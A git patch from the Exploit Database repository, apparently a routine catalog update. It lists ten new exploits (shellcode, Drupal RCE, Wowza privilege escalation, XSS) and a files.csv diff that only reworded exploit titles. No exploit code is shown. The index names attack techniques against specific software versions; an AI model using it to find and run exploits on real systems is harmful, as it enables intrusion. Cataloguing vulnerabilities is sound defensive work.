From ec03ab428f57cd2237dcb17a9f924eae430cbe17 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Thu, 21 Jul 2016 05:06:28 +0000
Subject: [PATCH] DB: 2016-07-21

10 new exploits

Microsoft Internet Explorer <= XP SP2 - HTML Help Control Local Zone Bypass
Microsoft Internet Explorer XP SP2 - HTML Help Control Local Zone Bypass

Mambo <= 4.5.3 & Joomla <= 1.0.7 - (feed) Path Disclosure and Denial of Service Exploit
Mambo 4.5.3 & Joomla 1.0.7 - (feed) Path Disclosure and Denial of Service Exploit

Simplog <= 0.9.3 - (tid) Remote SQL Injection Exploit
Simplog 0.9.3 - (tid) SQL Injection
Skulltag <= 0.96f - (Version String) Remote Format String PoC
OpenTTD <= 0.4.7 - Multiple Vulnerabilities/Denial of Service Exploit
Skulltag 0.96f - (Version String) Remote Format String PoC
OpenTTD 0.4.7 - Multiple Vulnerabilities

Apple Mac OS X Safari <= 2.0.3 (417.9.2) - Multiple Vulnerabilities (PoC)
Apple Mac OS X Safari 2.0.3 (417.9.2) - Multiple Vulnerabilities

Apple Mac OS X Safari <= 2.0.3 - (417.9.2) (ROWSPAN) DoS PoC
Apple Mac OS X Safari 2.0.3 - (417.9.2) (ROWSPAN) DoS PoC
Aardvark Topsites PHP <= 4.2.2 - (path) Remote File Inclusion
phpMyAgenda <= 3.0 Final (rootagenda) Remote Include
Aardvark Topsites PHP <= 4.2.2 - (lostpw.php) Remote Include Exploit
Aardvark Topsites PHP 4.2.2 - (path) Remote File Inclusion
phpMyAgenda 3.0 Final - (rootagenda) Remote Include
Aardvark Topsites PHP 4.2.2 - (lostpw.php) Remote File Inclusion

X7 Chat <= 2.0 - (help_file) Remote Commands Execution Exploit
X7 Chat 2.0 - (help_file) Remote Command Execution

Auction <= 1.3m (phpbb_root_path) Remote File Include Exploit
Auction 1.3m - (phpbb_root_path) Remote File Inclusion
acFTP FTP Server <= 1.4 - (USER) Remote Buffer Overflow PoC
Quake 3 Engine 1.32b R_RemapShader() Remote Client BoF Exploit
acFTP FTP Server 1.4 - (USER) Remote Buffer Overflow PoC
Quake 3 Engine 1.32b - R_RemapShader() Remote Client BoF Exploit

AWStats <= 6.5 - (migrate) Remote Shell Command Injection Exploit
AWStats 6.5 - (migrate) Remote Shell Command Injection

acFTP FTP Server <= 1.4 - (USER) Remote Denial of Service Exploit
acFTP FTP Server 1.4 - (USER) Remote Denial of Service
PHP-Fusion <= 6.00.306 - Multiple Vulnerabilities
Jetbox CMS <= 2.1 - (relative_script_path) Remote File Inclusion Exploit
ACal <= 2.2.6 - (day.php) Remote File Inclusion
EQdkp <= 1.3.0 - (dbal.php) Remote File Inclusion
PHP-Fusion 6.00.306 - Multiple Vulnerabilities
Jetbox CMS 2.1 - (relative_script_path) Remote File Inclusion
ACal 2.2.6 - (day.php) Remote File Inclusion
EQdkp 1.3.0 - (dbal.php) Remote File Inclusion

Microsoft Internet Explorer <= 6.0.2900 SP2 - (CSS Attribute) Denial of Service
Microsoft Internet Explorer 6.0.2900 SP2 - (CSS Attribute) Denial of Service

Unclassified NewsBoard <= 1.6.1 patch 1 - Arbitrary Local Inclusion Exploit
Unclassified NewsBoard 1.6.1 patch 1 - Local File Inclusion
Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (1)
Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (2)
Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (3)
Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (1)
Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (2)
Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (3)

Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (4)
Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (4)

Linux Kernel <= 2.6.17.4 - (proc) Local Root Exploit
Linux Kernel <= 2.6.17.4 - 'proc' Local Root Exploit

Linux Kernel 2.4 / 2.6 (x86_64) - System Call Emulation Exploit
Linux Kernel 2.4 / 2.6 x86_64) - System Call Emulation Exploit

\o - Local File Inclusion (1st)
Keller Web Admin CMS 0.94 Pro - Local File Inclusion (1)

PulseAudio setuid (Ubuntu 9.04 & Slackware 12.2.0) - Local Privilege Escalation
PulseAudio setuid (Ubuntu 9.04 / Slackware 12.2.0) - Local Privilege Escalation

Linux Kernel < 2.6.36-rc6 (Redhat/Ubuntu 10.04) - pktcdvd Kernel Memory Disclosure Proof of Concept
Linux Kernel < 2.6.36-rc6 (Redhat / Ubuntu 10.04) - pktcdvd Kernel Memory Disclosure Proof of Concept

Linux Kernel <= 2.2.18 (RH 7.0/6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root (1)
Linux Kernel <= 2.2.18 (RH 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root (1)
Linux/CRISv32 - Axis Communication Connect Back Shellcode (189 bytes)
Django CMS 3.3.0 - (Editor Snippet) Persistent XSS
Drupal RESTWS Module 7.x - Remote PHP Code Execution (Metasploit)
Linux/x86 - execve /bin/sh Shellcode (19 bytes)
Wowza Streaming Engine 4.5.0 - Local Privilege Escalation
Wowza Streaming Engine 4.5.0 - Remote Privilege Escalation
Wowza Streaming Engine 4.5.0 - Add Advanced Admin CSRF
Wowza Streaming Engine 4.5.0 - Multiple XSS
OpenSSHD <= 7.2p2 - Username Enumeration
WordPress Video Player Plugin 1.5.16 - SQL Injection
---
 files.csv                             |  74 +++---
 platforms/lin_x86/shellcode/40128.c   | 115 +++++++++
 platforms/lin_x86/shellcode/40131.c   |  37 +++
 platforms/linux/remote/40136.py       | 157 ++++++++++++
 platforms/multiple/webapps/40133.html |  60 +++++
 platforms/multiple/webapps/40134.html |  52 ++++
 platforms/multiple/webapps/40135.txt  | 117 +++++++++
 platforms/php/remote/40130.rb         |  86 +++++++
 platforms/php/webapps/40137.html      | 116 +++++++++
 platforms/python/webapps/40129.txt    | 349 ++++++++++++++++++++++++++
 platforms/windows/local/40132.txt     |  84 +++++++
 11 files changed, 1215 insertions(+), 32 deletions(-)
 create mode 100755 platforms/lin_x86/shellcode/40128.c
 create mode 100755 platforms/lin_x86/shellcode/40131.c
 create mode 100755 platforms/linux/remote/40136.py
 create mode 100755 platforms/multiple/webapps/40133.html
 create mode 100755 platforms/multiple/webapps/40134.html
 create mode 100755 platforms/multiple/webapps/40135.txt
 create mode 100755 platforms/php/remote/40130.rb
 create mode 100755 platforms/php/webapps/40137.html
 create mode 100755 platforms/python/webapps/40129.txt
 create mode 100755 platforms/windows/local/40132.txt

diff --git a/files.csv b/files.csv
index ffc3ee371..c41b04897 100755
--- a/files.csv
+++ b/files.csv
@@ -557,7 +557,7 @@ id,file,description,date,author,platform,type,port
 715,platforms/solaris/local/715.c,"Solaris 8/9 - passwd circ() Local Root Exploit",2004-12-24,"Marco Ivaldi",solaris,local,0
 716,platforms/solaris/remote/716.c,"Solaris 2.5.1/2.6/7/8 rlogin /bin/login - Buffer Overflow Exploit (SPARC)",2004-12-24,"Marco Ivaldi",solaris,remote,513
 718,platforms/linux/local/718.c,"Linux Kernel 2.6.x (Slackware 9.1 / Debian 3.0) - chown() Group Ownership Alteration Exploit",2004-12-24,"Marco Ivaldi",linux,local,0
-719,platforms/windows/remote/719.txt,"Microsoft Internet Explorer <= XP SP2 - HTML Help Control Local Zone Bypass",2004-12-25,Paul,windows,remote,0
+719,platforms/windows/remote/719.txt,"Microsoft Internet Explorer XP SP2 - HTML Help Control Local Zone Bypass",2004-12-25,Paul,windows,remote,0
 720,platforms/php/webapps/720.pl,"Sanity.b - phpBB <= 2.0.10 Bot Install (AOL/Yahoo Search)",2004-12-25,anonymous,php,webapps,0
 721,platforms/windows/dos/721.html,"Microsoft Windows Kernel - ANI File Parsing Crash",2004-12-25,Flashsky,windows,dos,0
 725,platforms/php/webapps/725.pl,"PhpInclude.Worm - PHP Scripts Automated Arbitrary File Inclusion",2004-12-25,anonymous,php,webapps,0
@@ -1419,23 +1419,23 @@ id,file,description,date,author,platform,type,port
 1694,platforms/php/webapps/1694.pl,"Internet PhotoShow (page) - Remote File Inclusion Exploit",2006-04-18,Hessam-x,php,webapps,0
 1695,platforms/php/webapps/1695.pl,"PHP Net Tools <= 2.7.1 - Remote Code Execution Exploit",2006-04-18,FOX_MULDER,php,webapps,0
 1697,platforms/php/webapps/1697.php,"PCPIN Chat <= 5.0.4 - (login/language) Remote Code Execution Exploit",2006-04-19,rgod,php,webapps,0
-1698,platforms/php/webapps/1698.php,"Mambo <= 4.5.3 & Joomla <= 1.0.7 - (feed) Path Disclosure and Denial of Service Exploit",2006-04-19,trueend5,php,webapps,0
+1698,platforms/php/webapps/1698.php,"Mambo 4.5.3 & Joomla 1.0.7 - (feed) Path Disclosure and Denial of Service Exploit",2006-04-19,trueend5,php,webapps,0
 1699,platforms/php/webapps/1699.txt,"RechnungsZentrale V2 <= 1.1.3 - Remote Inclusion",2006-04-19,"GroundZero Security",php,webapps,0
 1700,platforms/asp/webapps/1700.pl,"ASPSitem <= 1.83 - (Haberler.asp) Remote SQL Injection Exploit",2006-04-19,nukedx,asp,webapps,0
 1701,platforms/php/webapps/1701.php,"PHPSurveyor <= 0.995 - (surveyid) Remote Command Execution Exploit",2006-04-20,rgod,php,webapps,0
 1703,platforms/windows/remote/1703.pl,"Symantec Scan Engine 5.0.x.x Change Admin Password Remote Exploit",2006-04-21,"Marc Bevand",windows,remote,8004
 1704,platforms/php/webapps/1704.pl,"CoreNews <= 2.0.1 - (userid) Remote SQL Injection Exploit",2006-04-21,nukedx,php,webapps,0
-1705,platforms/php/webapps/1705.pl,"Simplog <= 0.9.3 - (tid) Remote SQL Injection Exploit",2006-04-21,nukedx,php,webapps,0
+1705,platforms/php/webapps/1705.pl,"Simplog 0.9.3 - (tid) SQL Injection",2006-04-21,nukedx,php,webapps,0
 1706,platforms/php/webapps/1706.txt,"dForum <= 1.5 - (DFORUM_PATH) Multiple Remote File Inclusions",2006-04-21,nukedx,php,webapps,0
 1707,platforms/php/webapps/1707.pl,"My Gaming Ladder Combo System <= 7.0 - Remote Code Execution Exploit",2006-04-22,nukedx,php,webapps,0
-1708,platforms/windows/dos/1708.txt,"Skulltag <= 0.96f - (Version String) Remote Format String PoC",2006-04-23,"Luigi Auriemma",windows,dos,0
-1709,platforms/multiple/dos/1709.txt,"OpenTTD <= 0.4.7 - Multiple Vulnerabilities/Denial of Service Exploit",2006-04-23,"Luigi Auriemma",multiple,dos,0
+1708,platforms/windows/dos/1708.txt,"Skulltag 0.96f - (Version String) Remote Format String PoC",2006-04-23,"Luigi Auriemma",windows,dos,0
+1709,platforms/multiple/dos/1709.txt,"OpenTTD 0.4.7 - Multiple Vulnerabilities",2006-04-23,"Luigi Auriemma",multiple,dos,0
 1710,platforms/php/webapps/1710.txt,"Clansys <= 1.1 - (index.php page) PHP Code Insertion",2006-04-23,nukedx,php,webapps,0
 1711,platforms/php/webapps/1711.txt,"Built2Go PHP Movie Review <= 2B Remote File Inclusion",2006-04-23,"Camille Myers",php,webapps,0
-1712,platforms/osx/dos/1712.html,"Apple Mac OS X Safari <= 2.0.3 (417.9.2) - Multiple Vulnerabilities (PoC)",2006-04-24,"Tom Ferris",osx,dos,0
+1712,platforms/osx/dos/1712.html,"Apple Mac OS X Safari 2.0.3 (417.9.2) - Multiple Vulnerabilities",2006-04-24,"Tom Ferris",osx,dos,0
 1713,platforms/php/webapps/1713.pl,"FlexBB <= 0.5.5 - (function/showprofile.php) SQL Injection Exploit",2006-04-24,Devil-00,php,webapps,0
 1714,platforms/asp/webapps/1714.txt,"BK Forum <= 4.0 - (member.asp) Remote SQL Injection",2006-04-24,n0m3rcy,asp,webapps,0
-1715,platforms/osx/dos/1715.html,"Apple Mac OS X Safari <= 2.0.3 - (417.9.2) (ROWSPAN) DoS PoC",2006-04-24,"Yannick von Arx",osx,dos,0
+1715,platforms/osx/dos/1715.html,"Apple Mac OS X Safari 2.0.3 - (417.9.2) (ROWSPAN) DoS PoC",2006-04-24,"Yannick von Arx",osx,dos,0
 1716,platforms/multiple/dos/1716.html,"Mozilla Firefox <= 1.5.0.2 - (js320.dll/xpcom_core.dll) Denial of Service PoC",2006-04-24,splices,multiple,dos,0
 1717,platforms/linux/remote/1717.c,"Fenice Oms 1.10 - (long get request) Remote Buffer Overflow Exploit",2006-04-25,c0d3r,linux,remote,0
 1718,platforms/hardware/dos/1718.pl,"OCE 3121/3122 Printer (parser.exe) Denial of Service Exploit",2006-04-26,sh4d0wman,hardware,dos,0
@@ -1450,11 +1450,11 @@ id,file,description,date,author,platform,type,port
 1727,platforms/php/webapps/1727.txt,"openPHPNuke <= 2.3.3 - Remote File Inclusion",2006-04-29,[Oo],php,webapps,0
 1728,platforms/php/webapps/1728.txt,"Knowledge Base Mod <= 2.0.2 - (phpBB) Remote Inclusion",2006-04-29,[Oo],php,webapps,0
 1729,platforms/php/webapps/1729.txt,"Limbo CMS <= 1.0.4.2 - (sql.php) Remote File Inclusion",2006-04-29,[Oo],php,webapps,0
-1730,platforms/php/webapps/1730.txt,"Aardvark Topsites PHP <= 4.2.2 - (path) Remote File Inclusion",2006-04-30,[Oo],php,webapps,0
-1731,platforms/php/webapps/1731.txt,"phpMyAgenda <= 3.0 Final (rootagenda) Remote Include",2006-04-30,Aesthetico,php,webapps,0
-1732,platforms/php/webapps/1732.pl,"Aardvark Topsites PHP <= 4.2.2 - (lostpw.php) Remote Include Exploit",2006-04-30,cijfer,php,webapps,0
+1730,platforms/php/webapps/1730.txt,"Aardvark Topsites PHP 4.2.2 - (path) Remote File Inclusion",2006-04-30,[Oo],php,webapps,0
+1731,platforms/php/webapps/1731.txt,"phpMyAgenda 3.0 Final - (rootagenda) Remote Include",2006-04-30,Aesthetico,php,webapps,0
+1732,platforms/php/webapps/1732.pl,"Aardvark Topsites PHP 4.2.2 - (lostpw.php) Remote File Inclusion",2006-04-30,cijfer,php,webapps,0
 1733,platforms/php/webapps/1733.pl,"Invision Power Board <= 2.1.5 - (from_contact) SQL Injection Exploit",2006-05-01,"Ykstortion Security",php,webapps,0
-1738,platforms/php/webapps/1738.php,"X7 Chat <= 2.0 - (help_file) Remote Commands Execution Exploit",2006-05-02,rgod,php,webapps,0
+1738,platforms/php/webapps/1738.php,"X7 Chat 2.0 - (help_file) Remote Command Execution",2006-05-02,rgod,php,webapps,0
 1739,platforms/osx/remote/1739.pl,"Darwin Streaming Server <= 4.1.2 - (parse_xml.cgi) Code Execution Exploit",2003-02-24,FOX_MULDER,osx,remote,0
 1740,platforms/php/webapps/1740.pl,"Fast Click <= 1.1.3 / <= 2.3.8 - (show.php) Remote File Inclusion Exploit",2006-05-02,R@1D3N,php,webapps,0
 1741,platforms/linux/remote/1741.c,"MySQL <= 5.0.20 COM_TABLE_DUMP Memory Leak/Remote BoF Exploit",2006-05-02,"Stefano Di Paola",linux,remote,3306
@@ -1462,23 +1462,23 @@ id,file,description,date,author,platform,type,port
 1743,platforms/windows/dos/1743.pl,"Golden FTP Server Pro 2.70 - (APPE) Remote Buffer Overflow PoC",2006-05-03,"Jerome Athias",windows,dos,0
 1744,platforms/php/webapps/1744.pl,"Albinator <= 2.0.6 - (Config_rootdir) Remote File Inclusion Exploit",2006-05-03,webDEViL,php,webapps,0
 1746,platforms/linux/dos/1746.pl,"zawhttpd <= 0.8.23 - (GET) Remote Buffer Overflow DoS",2006-05-04,"Kamil Sienicki",linux,dos,0
-1747,platforms/php/webapps/1747.pl,"Auction <= 1.3m (phpbb_root_path) Remote File Include Exploit",2006-05-04,webDEViL,php,webapps,0
+1747,platforms/php/webapps/1747.pl,"Auction 1.3m - (phpbb_root_path) Remote File Inclusion",2006-05-04,webDEViL,php,webapps,0
 1748,platforms/windows/dos/1748.py,"XM Easy Personal FTP Server <= 4.3 - (USER) Remote Buffer Overflow PoC",2006-05-04,rewterz,windows,dos,0
-1749,platforms/windows/dos/1749.pl,"acFTP FTP Server <= 1.4 - (USER) Remote Buffer Overflow PoC",2006-05-04,Preddy,windows,dos,0
-1750,platforms/linux/remote/1750.c,"Quake 3 Engine 1.32b R_RemapShader() Remote Client BoF Exploit",2006-05-05,landser,linux,remote,0
+1749,platforms/windows/dos/1749.pl,"acFTP FTP Server 1.4 - (USER) Remote Buffer Overflow PoC",2006-05-04,Preddy,windows,dos,0
+1750,platforms/linux/remote/1750.c,"Quake 3 Engine 1.32b - R_RemapShader() Remote Client BoF Exploit",2006-05-05,landser,linux,remote,0
 1751,platforms/php/webapps/1751.php,"Limbo CMS <= 1.0.4.2 - (catid) Remote SQL Injection Exploit",2006-05-05,[Oo],php,webapps,0
 1752,platforms/php/webapps/1752.pl,"StatIt 4 - (statitpath) Remote File Inclusion Exploit",2006-05-05,IGNOR3,php,webapps,0
 1753,platforms/php/webapps/1753.txt,"TotalCalendar <= 2.30 - (inc) Remote File Include",2006-05-05,Aesthetico,php,webapps,0
 1754,platforms/windows/dos/1754.py,"FileCOPA FTP Server <= 1.01 - (USER) Remote Pre-Auth DoS",2006-05-05,Bigeazer,windows,dos,0
-1755,platforms/cgi/webapps/1755.py,"AWStats <= 6.5 - (migrate) Remote Shell Command Injection Exploit",2006-05-06,redsand,cgi,webapps,0
+1755,platforms/cgi/webapps/1755.py,"AWStats 6.5 - (migrate) Remote Shell Command Injection",2006-05-06,redsand,cgi,webapps,0
 1756,platforms/php/webapps/1756.pl,"HiveMail <= 1.3 - (addressbook.add.php) Remote Code Execution Exploit",2006-05-06,[Oo],php,webapps,0
-1757,platforms/windows/dos/1757.c,"acFTP FTP Server <= 1.4 - (USER) Remote Denial of Service Exploit",2006-05-06,Omni,windows,dos,0
+1757,platforms/windows/dos/1757.c,"acFTP FTP Server 1.4 - (USER) Remote Denial of Service",2006-05-06,Omni,windows,dos,0
 1758,platforms/windows/dos/1758.pl,"TinyFTPD <= 1.4 - (USER) Remote Buffer Overflow DoS",2006-05-06,[Oo],windows,dos,0
 1759,platforms/asp/webapps/1759.txt,"VP-ASP 6.00 - (shopcurrency.asp) Remote SQL Injection",2006-05-06,tracewar,asp,webapps,0
-1760,platforms/php/webapps/1760.php,"PHP-Fusion <= 6.00.306 - Multiple Vulnerabilities",2006-05-07,rgod,php,webapps,0
-1761,platforms/php/webapps/1761.pl,"Jetbox CMS <= 2.1 - (relative_script_path) Remote File Inclusion Exploit",2006-05-07,beford,php,webapps,0
-1763,platforms/php/webapps/1763.txt,"ACal <= 2.2.6 - (day.php) Remote File Inclusion",2006-05-07,PiNGuX,php,webapps,0
-1764,platforms/php/webapps/1764.txt,"EQdkp <= 1.3.0 - (dbal.php) Remote File Inclusion",2006-05-07,OLiBekaS,php,webapps,0
+1760,platforms/php/webapps/1760.php,"PHP-Fusion 6.00.306 - Multiple Vulnerabilities",2006-05-07,rgod,php,webapps,0
+1761,platforms/php/webapps/1761.pl,"Jetbox CMS 2.1 - (relative_script_path) Remote File Inclusion",2006-05-07,beford,php,webapps,0
+1763,platforms/php/webapps/1763.txt,"ACal 2.2.6 - (day.php) Remote File Inclusion",2006-05-07,PiNGuX,php,webapps,0
+1764,platforms/php/webapps/1764.txt,"EQdkp 1.3.0 - (dbal.php) Remote File Inclusion",2006-05-07,OLiBekaS,php,webapps,0
 1765,platforms/php/webapps/1765.pl,"Dokeos Lms <= 1.6.4 - (authldap.php) Remote File Include Exploit",2006-05-08,beford,php,webapps,0
 1766,platforms/php/webapps/1766.pl,"Claroline e-Learning 1.75 - (ldap.inc.php) Remote File Inclusion Exploit",2006-05-08,beford,php,webapps,0
 1767,platforms/php/webapps/1767.txt,"ActualAnalyzer Server <= 8.23 - (rf) Remote File Include",2006-05-08,Aesthetico,php,webapps,0
@@ -1487,9 +1487,9 @@ id,file,description,date,author,platform,type,port
 1772,platforms/windows/local/1772.c,"Intel Wireless Service (s24evmon.exe) Shared Memory Exploit",2006-05-09,"Ruben Santamarta ",windows,local,0
 1773,platforms/php/webapps/1773.txt,"phpRaid <= 3.0.b3 - (phpBB/SMF) Remote File Inclusion Vulnerabilities",2006-05-09,"Kurdish Security",php,webapps,0
 1774,platforms/php/webapps/1774.txt,"pafileDB <= 2.0.1 - (mxBB/phpBB) Remote File Inclusion",2006-05-09,Darkfire,php,webapps,0
-1775,platforms/windows/dos/1775.html,"Microsoft Internet Explorer <= 6.0.2900 SP2 - (CSS Attribute) Denial of Service",2006-05-10,seven,windows,dos,0
+1775,platforms/windows/dos/1775.html,"Microsoft Internet Explorer 6.0.2900 SP2 - (CSS Attribute) Denial of Service",2006-05-10,seven,windows,dos,0
 1776,platforms/windows/remote/1776.c,"Medal of Honor (getinfo) Remote Buffer Overflow Exploit",2006-05-10,RunningBon,windows,remote,12203
-1777,platforms/php/webapps/1777.php,"Unclassified NewsBoard <= 1.6.1 patch 1 - Arbitrary Local Inclusion Exploit",2006-05-11,rgod,php,webapps,0
+1777,platforms/php/webapps/1777.php,"Unclassified NewsBoard 1.6.1 patch 1 - Local File Inclusion",2006-05-11,rgod,php,webapps,0
 1778,platforms/php/webapps/1778.txt,"Foing <= 0.7.0 - (phpBB) Remote File Inclusion",2006-05-12,"Kurdish Security",php,webapps,0
 1779,platforms/php/webapps/1779.txt,"Php Blue Dragon CMS <= 2.9 - Remote File Include",2006-05-12,Kacper,php,webapps,0
 1780,platforms/php/webapps/1780.php,"phpBB <= 2.0.20 - (Admin/Restore DB/default_lang) Remote Exploit",2006-05-13,rgod,php,webapps,0
@@ -1710,16 +1710,16 @@ id,file,description,date,author,platform,type,port
 2001,platforms/windows/dos/2001.c,"Microsoft Word 2000/2003 Unchecked Boundary Condition",2006-07-10,"naveed afzal",windows,dos,0
 2002,platforms/php/webapps/2002.pl,"EJ3 TOPo 2.2 - (descripcion) Remote Command Execution Exploit",2006-07-10,Hessam-x,php,webapps,0
 2003,platforms/php/webapps/2003.txt,"SQuery <= 4.5 - (gore.php) Remote File Inclusion",2006-07-10,SHiKaA,php,webapps,0
-2004,platforms/linux/local/2004.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (1)",2006-07-11,"dreyer & RoMaNSoFt",linux,local,0
-2005,platforms/linux/local/2005.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (2)",2006-07-12,"Julien Tinnes",linux,local,0
-2006,platforms/linux/local/2006.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (3)",2006-07-13,"Marco Ivaldi",linux,local,0
+2004,platforms/linux/local/2004.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (1)",2006-07-11,"dreyer & RoMaNSoFt",linux,local,0
+2005,platforms/linux/local/2005.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (2)",2006-07-12,"Julien Tinnes",linux,local,0
+2006,platforms/linux/local/2006.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (3)",2006-07-13,"Marco Ivaldi",linux,local,0
 2007,platforms/php/webapps/2007.php,"phpBB 3 - (memberlist.php) Remote SQL Injection Exploit",2006-07-13,rgod,php,webapps,0
 2008,platforms/php/webapps/2008.php,"Phorum 5 - (pm.php) Arbitrary Local Inclusion Exploit",2006-07-13,rgod,php,webapps,0
 2009,platforms/php/webapps/2009.txt,"CzarNews <= 1.14 - (tpath) Remote File Inclusion",2006-07-13,SHiKaA,php,webapps,0
 2010,platforms/php/webapps/2010.pl,"Invision Power Board 2.1 <= 2.1.6 - Remote SQL Injection Exploit",2006-07-14,RusH,php,webapps,0
-2011,platforms/linux/local/2011.sh,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (4)",2006-07-14,Sunay,linux,local,0
+2011,platforms/linux/local/2011.sh,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (4)",2006-07-14,Sunay,linux,local,0
 2012,platforms/php/webapps/2012.php,"MyBulletinBoard (MyBB) <= 1.1.5 - (CLIENT-IP) SQL Injection Exploit",2006-07-15,rgod,php,webapps,0
-2013,platforms/linux/local/2013.c,"Linux Kernel <= 2.6.17.4 - (proc) Local Root Exploit",2006-07-15,h00lyshit,linux,local,0
+2013,platforms/linux/local/2013.c,"Linux Kernel <= 2.6.17.4 - 'proc' Local Root Exploit",2006-07-15,h00lyshit,linux,local,0
 2014,platforms/windows/remote/2014.pl,"Winlpd 1.2 Build 1076 - Remote Buffer Overflow Exploit",2006-07-15,"Pablo Isola",windows,remote,515
 2015,platforms/linux/local/2015.py,"Rocks Clusters <= 4.1 - (umount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0
 2016,platforms/linux/local/2016.sh,"Rocks Clusters <= 4.1 - (mount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0
@@ -4105,7 +4105,7 @@ id,file,description,date,author,platform,type,port
 4457,platforms/php/webapps/4457.txt,"Softbiz Classifieds PLUS (id) Remote SQL Injection",2007-09-26,"Khashayar Fereidani",php,webapps,0
 4458,platforms/asp/webapps/4458.txt,"Novus 1.0 - (notas.asp nota_id) Remote SQL Injection",2007-09-26,ka0x,asp,webapps,0
 4459,platforms/php/webapps/4459.txt,"ActiveKB Knowledgebase 2.? (catId) Remote SQL Injection",2007-09-26,Luna-Tic/XTErner,php,webapps,0
-4460,platforms/linux/local/4460.c,"Linux Kernel 2.4 / 2.6 (x86_64) - System Call Emulation Exploit",2007-09-27,"Robert Swiecki",linux,local,0
+4460,platforms/linux/local/4460.c,"Linux Kernel 2.4 / 2.6 x86_64) - System Call Emulation Exploit",2007-09-27,"Robert Swiecki",linux,local,0
 4461,platforms/php/webapps/4461.txt,"lustig.cms BETA 2.5 - (forum.php view) Remote File Inclusion",2007-09-27,GoLd_M,php,webapps,0
 4462,platforms/php/webapps/4462.txt,"Chupix CMS 0.2.3 - (repertoire) Remote File Inclusion",2007-09-27,0in,php,webapps,0
 4463,platforms/php/webapps/4463.txt,"integramod nederland 1.4.2 - Remote File Inclusion",2007-09-27,"Mehmet Ince",php,webapps,0
@@ -5574,7 +5574,7 @@ id,file,description,date,author,platform,type,port
 5952,platforms/php/webapps/5952.txt,"phpBLASTER CMS 1.0 RC1 - Multiple Local File Inclusion Vulnerabilities",2008-06-26,CraCkEr,php,webapps,0
 5954,platforms/php/webapps/5954.txt,"A+ PHP Scripts Nms Insecure Cookie Handling",2008-06-26,"Virangar Security",php,webapps,0
 5955,platforms/php/webapps/5955.txt,"Orca 2.0/2.0.2 - (params.php) Remote File Inclusion",2008-06-26,Ciph3r,php,webapps,0
-5956,platforms/php/webapps/5956.txt,"\o - Local File Inclusion (1st)",2008-06-26,StAkeR,php,webapps,0
+5956,platforms/php/webapps/5956.txt,"Keller Web Admin CMS 0.94 Pro - Local File Inclusion (1)",2008-06-26,StAkeR,php,webapps,0
 5957,platforms/php/webapps/5957.txt,"otmanager CMS 24a - (LFI/XSS) Multiple Vulnerabilities",2008-06-27,"CWH Underground",php,webapps,0
 5958,platforms/php/webapps/5958.txt,"w1l3d4 philboard 1.2 - (blind sql/XSS) Multiple Vulnerabilities",2008-06-27,Bl@ckbe@rD,php,webapps,0
 5959,platforms/php/webapps/5959.txt,"OTManager CMS 2.4 Insecure Cookie Handling",2008-06-27,"Virangar Security",php,webapps,0
@@ -8685,7 +8685,7 @@ id,file,description,date,author,platform,type,port
 9205,platforms/php/webapps/9205.txt,"mcshoutbox 1.1 - (SQL/XSS/shell) Multiple Vulnerabilities",2009-07-20,SirGod,php,webapps,0
 9206,platforms/freebsd/dos/9206.c,"FreeBSD 7.2 - (pecoff executable) Local Denial of Service Exploit",2009-07-20,"Shaun Colley",freebsd,dos,0
 9207,platforms/linux/local/9207.sh,"PulseAudio setuid - Local Privilege Escalation Exploit",2009-07-20,anonymous,linux,local,0
-9208,platforms/linux/local/9208.txt,"PulseAudio setuid (Ubuntu 9.04 & Slackware 12.2.0) - Local Privilege Escalation",2009-07-20,anonymous,linux,local,0
+9208,platforms/linux/local/9208.txt,"PulseAudio setuid (Ubuntu 9.04 / Slackware 12.2.0) - Local Privilege Escalation",2009-07-20,anonymous,linux,local,0
 9209,platforms/hardware/remote/9209.txt,"DD-WRT - (httpd service) Remote Command Execution",2009-07-20,gat3way,hardware,remote,0
 9211,platforms/php/webapps/9211.txt,"Alibaba-clone CMS - (SQL/bSQL) Remote SQL Injection Vulnerabilities",2009-07-20,"599eme Man",php,webapps,0
 9212,platforms/windows/dos/9212.pl,"Acoustica MP3 Audio Mixer 2.471 - (.sgp) Crash Exploit",2009-07-20,prodigy,windows,dos,0
@@ -13183,7 +13183,7 @@ id,file,description,date,author,platform,type,port
 15146,platforms/php/webapps/15146.txt,"Achievo 1.4.3 - CSRF",2010-09-28,"Pablo Milano",php,webapps,0
 15147,platforms/php/webapps/15147.txt,"Micro CMS 1.0 b1 - Persistent XSS",2010-09-28,"SecPod Research",php,webapps,0
 15148,platforms/windows/dos/15148.txt,"Microsoft Excel - SxView Record Parsing Heap Memory Corruption",2010-09-29,Abysssec,windows,dos,0
-15150,platforms/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 (Redhat/Ubuntu 10.04) - pktcdvd Kernel Memory Disclosure Proof of Concept",2010-09-29,"Jon Oberheide",linux,local,0
